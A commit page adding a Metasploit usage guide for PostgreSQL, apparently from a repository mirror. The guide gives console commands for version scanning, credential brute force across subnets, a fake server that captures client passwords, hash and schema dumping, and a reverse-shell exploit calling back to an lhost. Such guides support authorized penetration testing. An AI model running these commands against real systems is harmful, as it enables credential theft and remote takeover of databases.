adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add separate pages for workflows and guides

Browse Source
This commit is contained in:
adfoster-r7
2022-04-21 21:18:56 +01:00
parent 2f4a09c9c8
commit e733be7203
8 changed files with 595 additions and 637 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Metasploit-Guide-PostgreSQL.md
+118
View File
@@ -0,0 +1,118 @@
## PostgreSQL
For instance, when running a PostgreSQL instance:
```
docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
```
### PostgreSQL Enumeration
Enumerate version:
```
use auxiliary/scanner/postgres/postgres_version
run postgres://192.168.123.13
run postgres://postgres:password@192.168.123.13
```
### PostgreSQL Login / Bruteforce
If you have PostgreSQL credentials to validate:
```
use auxiliary/scanner/postgres/postgres_login
run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
```
Re-using PostgreSQL credentials in a subnet:
```
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:myspostgresl://user:pass@192.168.222.0 threads=50
```
Using an alternative port:
```
use auxiliary/scanner/postgres/postgres_login
run postgres://user:pass@192.168.123.6:2222
```
Brute-force host with known user and password list:
```
use auxiliary/scanner/postgres/postgres_login
run postgres://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
```
Brute-force credentials:
```
use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
```
Brute-force credentials in a subnet:
```
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
```
### PostgreSQL Capture Server
Captures and log PostgreSQL credentials:
```
use auxiliary/server/capture/postgresql
run
```
For example, if a client connects with:
```
psql postgres://postgres:mysecretpassword@localhost:5432
```
Metasploit's output will be:
```
msf6 auxiliary(server/capture/postgresql) >
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
```
### PostgreSQL Dumping
User and hash dump:
```
use auxiliary/scanner/postgres/postgres_hashdump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13/database_name
```
Schema dump:
```
use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
```
### PostgreSQL Querying
```
use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
```
### PostgreSQL Reverse Shell
```
use exploit/linux/postgres/postgres_payload
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
```